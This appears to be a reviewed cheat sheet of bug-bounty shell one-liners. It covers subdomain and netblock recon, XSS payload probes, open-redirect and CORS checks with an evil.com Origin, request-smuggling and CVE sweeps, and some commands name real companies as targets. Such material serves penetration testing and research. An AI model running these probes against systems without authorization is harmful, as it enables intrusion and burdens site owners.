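# Org -> netblocks -> hostnames: metabigor resolves the org name to CIDRs, prips
# expands each CIDR into addresses, hakrevdns reverse-resolves them and anew
# de-duplicates the stream.
# The CIDR is handed to the inner shell as a positional argument ("$1") instead of
# being pasted into the command string, so unexpected characters in tool output
# cannot be executed as shell.
# NOTE(review): the awk/sed clean-up assumes metabigor's column layout (CIDR in $3)
# and the sed bracket expression "[[0-9]]\+\." looks mangled (it matches runs of
# "[" or digits followed by "]." rather than a numeric prefix) — confirm against the
# installed metabigor's actual output before relying on it.
echo 'dod' | metabigor net --org -v | awk '{print $3}' | sed 's/[[0-9]]\+\.//g' \
  | xargs -I@ sh -c 'prips "$1" | hakrevdns | anew' _ @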
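# Reflected-XSS probe: take every archived URL that carries a query string,
# replace each parameter value with a script payload and look for it echoed back
# verbatim. A hit only shows the payload is reflected unencoded — whether it
# executes still depends on the injection context, CSP and the browser, so
# verify by hand before reporting.
# Fixes vs. the original: "while read host do ; do" only worked because "do" was
# parsed as a second variable name for read; the colour escape was passed to
# echo without -e (printed literally under bash); $target was unquoted.
# --insecure disables TLS verification, so point this only at in-scope hosts;
# --path-as-is stops curl normalising the path before sending it.
waybackurls "$target" | grep '=' | qsreplace '"><script>alert(1)</script>' \
  | while IFS= read -r host; do
      curl -s --path-as-is --insecure "$host" | grep -qs '<script>alert(1)</script>' \
        && printf '%s \033[0;31mVulnerable\033[0m\n' "$host"
    done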
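# Same reflected-XSS probe with an SVG event-handler payload, for targets that
# strip or encode "<script>" but let other tags through. The original hard-coded
# microsoft.com; it is kept as the default, set $target for an in-scope domain.
# A hit means the payload came back unencoded, not that it fires — check the
# context and CSP by hand. --insecure disables TLS verification; --path-as-is
# stops curl normalising the path. The read loop is written with IFS= read -r so
# the URL is taken verbatim (the original's "read host do" only worked by accident).
waybackurls "${target:-microsoft.com}" | grep '=' | qsreplace '"><svg/onload=alert(1337)>' \
  | while IFS= read -r host; do
      curl -s --path-as-is --insecure "$host" | grep -qs '<svg/onload=alert(1337)>' \
        && printf '%s \033[0;31mVulnerable\033[0m\n' "$host"
    done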
Open redirect
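# Open-redirect probe: gau pulls archived URLs for the domain given as $1, gf's
# "redirect" patterns keep the ones with redirect-looking parameters, qsreplace
# points every parameter value at $LHOST, and a hit is any response whose
# Location header sends the client there.
# The URL reaches the inner shell as "$1" rather than being substituted into the
# command text, so characters in an archived URL cannot break out into shell.
# The header match is case-insensitive because HTTP/2 responses lower-case
# header names. -I sends HEAD; some handlers only redirect on GET, so a miss is
# not conclusive. LHOST stays exported so the inner sh sees it.
export LHOST="http://localhost"
gau "$1" | gf redirect | qsreplace "$LHOST" \
  | xargs -I % -P 25 sh -c 'curl -Is "$1" 2>&1 | grep -qi "^location: $LHOST" && echo "VULN! $1"' _ %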
XSS
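# Crawl-and-fuzz XSS pipeline: gospider crawls every target in targets_urls.txt
# (static assets skipped via the blacklist regex), only 200 responses are kept,
# URLs with a query string get every parameter value tagged by qsreplace -a, and
# dalfox fuzzes the result; output is mirrored to result.txt.
# The blacklist dot is now escaped: an unescaped "." matches any character, so
# paths such as "/icons/" or "/pdf-viewer" were silently dropped as if they were
# .ico/.pdf assets.
# NOTE(review): awk '{print $5}' assumes gospider's default column layout puts the
# URL in the fifth field — confirm against the installed version.
gospider -S targets_urls.txt -c 10 -d 5 \
  --blacklist "\.(jpg|jpeg|gif|css|tif|tiff|png|ttf|woff|woff2|ico|pdf|svg|txt)" --other-source \
  | grep -e "code-200" | awk '{print $5}' | grep "=" | qsreplace -a | dalfox pipe | tee result.txt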
Find JS variables (candidate parameter names)
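# Harvest JavaScript variable names from each archived page and turn them into
# candidate query parameters ("URL?name=xss") for manual XSS / parameter testing.
# Fixes vs. the original one-liner: unescaped dots in the asset filter, "o" for
# "0" in the character class, ".wolf" for ".woff", broken sed quoting around
# $url, and ":" where ";" was needed before echo.
# The URL is passed to awk with -v instead of being spliced into a sed
# expression, so URL characters such as "," or "&" cannot corrupt the
# substitution (awk -v does interpret backslash escapes; archived URLs rarely
# contain them). URLs containing ".js" are skipped before fetching — the
# original discarded them only after the request. Replace site.com with an
# in-scope target.
assetfinder site.com | gau \
  | grep -Ev '\.(css|png|jpeg|jpg|svg|gif|woff|js)' \
  | while IFS= read -r url; do
      vars=$(curl -s "$url" | grep -Eo 'var [a-zA-Z0-9_]+' \
               | awk -v u="$url" '{print u "?" $2 "=xss"}')
      printf '\033[1;33m%s\n\033[1;32m%s\033[0m\n' "$url" "$vars"
    done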
Google dorks
site:$target ext:odt |ext:rtf |ext:sxw |ext:bkf |ext:bkp |ext:old |ext:backup |ext:psw |ext:bak |ext:log |ext:logs |ext:csv |ext:xls |ext:xlsx |ext:doc |ext:docx |ext:docs
Sensitive data in JS files
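# Collect a target's JavaScript files from the archive indexes and run
# LinkFinder over each one to pull out endpoints and paths hidden in the JS.
# Fixes vs. the original: "http://linkfinder.py" was an auto-linked script path
# (python3 would try to open a URL as a file); the stray "fi" was a syntax error
# (there is no "if"); the match is tightened to URLs whose path ends in .js
# (query string or fragment allowed) so .jsp/.jsx/.json resources are not
# treated as scripts, which also makes the separate ".json" filter unnecessary.
# Adjust the path to linkfinder.py for your checkout.
gau "$target" | grep -iE '\.js(\?|#|$)' | sort -u > "$target.JS.txt"
while IFS= read -r line; do
  python3 linkfinder.py -i "$line" -o cli
done < "$target.JS.txt"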
CVE Scanner
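#!/bin/bash
# CVE sweep over a Chaos dataset: download ProjectDiscovery's subdomain dump for
# the domain given as $1, probe which hosts answer HTTP, then run the jaeles CVE
# signatures and the nuclei CVE templates against the live ones.
# Changes vs. the original: the archive is fetched over HTTPS (an http:// download
# of a host list that is then fed to scanners is an easy man-in-the-middle
# target — the other Chaos snippet in this file already uses https); it is
# unpacked into a per-target directory so "cat *.txt" cannot pick up unrelated
# files in the working directory; the "-nc" reuse of a cached zip is kept via an
# explicit existence check (wget -nc exits non-zero on an existing file, which
# would trip set -e); and the script stops on the first failure instead of
# scanning an empty or stale host list.
# Usage: ./cve-scan.sh <target-domain>
set -euo pipefail
target=${1:?usage: $0 <target-domain>}

[ -f "$target.zip" ] || wget -nv "https://chaos-data.projectdiscovery.io/$target.zip"
mkdir -p "$target.chaos"
unzip -o -q "$target.zip" -d "$target.chaos"

# 300 threads is aggressive; lower it if the target rate-limits or you need to
# stay quiet.
cat "$target.chaos"/*.txt | httpx -silent -threads 300 > "$target.alive"

jaeles scan -s ~/jaeles-signatures/cves/ -c 100 < "$target.alive"
nuclei -l "$target.alive" -t ~/nuclei-templates/cves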
Smuggler Finder
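# HTTP request-smuggling sweep: enumerate subdomains, keep the ones that serve
# HTTP, and feed them to smuggler.py on stdin. subs.txt is written via tee so the
# enumeration can be reused without re-querying the sources; $target is quoted
# so an empty or odd value cannot word-split.
assetfinder "$target" | tee subs.txt | httpx -threads 300 -silent | python3 smuggler.py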
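# Same smuggling sweep, seeded from Shodan's DNS data instead of assetfinder.
# "http://sony.com" was an auto-linked artifact: shodan domain takes a bare
# domain name. rush substitutes {} textually into a command it runs through a
# shell, so only feed it hostnames you trust not to contain shell metacharacters
# (quoting {} narrows, but does not remove, that risk).
# NOTE(review): awk '{print $3}' takes the third column of shodan's output (the
# record value); the sensitive-file snippet further down builds FQDNs from $1
# instead — confirm which column you actually want for your shodan CLI version.
shodan domain sony.com | awk '{print $3}' | httpx -silent | rush -j 3 'python3 smuggler.py -u "{}"'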
Template scan with nuclei (recon, bug hunting / pentest automation)
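# Template scan of a host list: nuclei reads the targets directly with -l instead
# of via "cat hosts.txt |", and only critical/high/medium findings are reported.
# Point -t at your local nuclei-templates checkout.
nuclei -l hosts.txt -t /path/to/nuclei-templates -severity critical,high,medium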
Sensitive-data finder
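# Sensitive-file sweep seeded from Shodan: shodan domain lists subdomain labels,
# awk re-attaches the domain to build FQDNs, httpx keeps the live ones (recorded
# in shodanHostsUp via anew), and jaeles runs its "sensitive" signatures against
# each host, appending new findings to JaelesShodanHosts.
# "http://paypal.com" was an auto-linked artifact: shodan domain needs a bare
# domain, and the scheme would otherwise be glued into every hostname.
# The host is passed to the inner shell as "$1" instead of being spliced into
# the command string, so odd characters in DNS data cannot run as shell.
# 300 concurrent connections is aggressive — reduce it for rate-limited targets.
domain="paypal.com"
shodan domain "$domain" | awk -v domain="$domain" '{print $1"."domain}' \
  | httpx -threads 300 | anew shodanHostsUp \
  | xargs -I@ -P3 sh -c 'jaeles -c 300 scan -s ~/.jaeles/base-signatures/sensitive/ -u "$1" | anew JaelesShodanHosts' _ @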
XSS
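# Crawl-and-test XSS sweep seeded from Shodan: every live host is handed to
# XSStrike with --crawl. The host goes to the inner shell as "$1" instead of
# being substituted into the command text, so a hostile record value cannot
# inject shell. Set $target to an in-scope bare domain (the original used the
# literal placeholder TARGET).
# NOTE(review): awk '{print $3}' picks the third column of shodan's output —
# confirm that is the value you want to scan rather than the subdomain label.
shodan domain "$target" | awk '{print $3}' | httpx -silent \
  | xargs -I@ sh -c 'python3 xsstrike.py -u "$1" --crawl' _ @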
CVE
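# CVE sweep over a Chaos dataset with jaeles: download the "lime" subdomain dump,
# probe for live hosts, expand each into its archived URLs with gau, de-dup with
# anew and run every jaeles signature against each URL, three at a time.
# Fixes vs. the original: "unzip http://lime.zip" was an auto-linked artifact,
# and "cat *.txt >> lime.txt" appended every .txt in the working directory —
# including lime.txt itself on a second run — so the archive is now unpacked
# into its own directory and the host list is rebuilt, de-duplicated, each time.
# rush substitutes {} textually into a shell command; only feed it URLs from
# sources you trust not to contain shell metacharacters.
wget -nv https://chaos-data.projectdiscovery.io/lime.zip
mkdir -p lime.chaos && unzip -o -q lime.zip -d lime.chaos
cat lime.chaos/*.txt | sort -u > lime.txt
httpx -silent -threads 200 -l lime.txt | gau -subs -retries 2 | anew \
  | rush -j 3 'jaeles scan -s /jaeles-signatures/ -u "{}"'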
JS Finder
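# Discover JavaScript files: probe each host in target.txt (read directly with
# -l rather than via cat), let subjs pull the script URLs out of the responses,
# and anew de-duplicates the stream.
httpx -silent -l target.txt | subjs | anew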
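# Append a target's JavaScript URLs (path ending in .js; query string or
# fragment allowed) to attJS.txt. The match is tightened so .jsp/.jsx/.json
# resources are not picked up, which makes the separate ".json" filter
# unnecessary; $target is quoted so it cannot word-split.
gau "$target" | grep -iE '\.js(\?|#|$)' | sort -u >> attJS.txt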
CORS Scanner
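# CORS misconfiguration sweep: for every live subdomain, send a request with an
# attacker-controlled Origin and flag responses that reflect it in
# Access-Control-Allow-Origin.
# Fixes vs. the original: "http://fitbit.com" was an auto-linked artifact
# (assetfinder wants a bare domain); the check used "[[ ]]", which is not
# available in a POSIX sh (rush runs the command through the system shell);
# and matching any "http://evil.com" anywhere in the headers is replaced by a
# case-insensitive match on the ACAO header itself, the only header that matters.
# A reflected origin is exploitable only if the response also carries
# Access-Control-Allow-Credentials: true (or the data is sensitive without
# cookies) — check that before reporting. -I sends HEAD, which some servers
# answer differently from GET. rush substitutes {} textually into the command,
# so only feed it hostnames you trust not to contain shell metacharacters.
assetfinder fitbit.com | httpx -threads 300 -follow-redirects -silent \
  | rush -j200 'curl -m5 -s -I -H "Origin: http://evil.com" "{}" | grep -qi "^access-control-allow-origin: *http://evil\.com" && printf "\n\033[0;32m[VUL TO CORS] - {}\033[0m"' 2>/dev/null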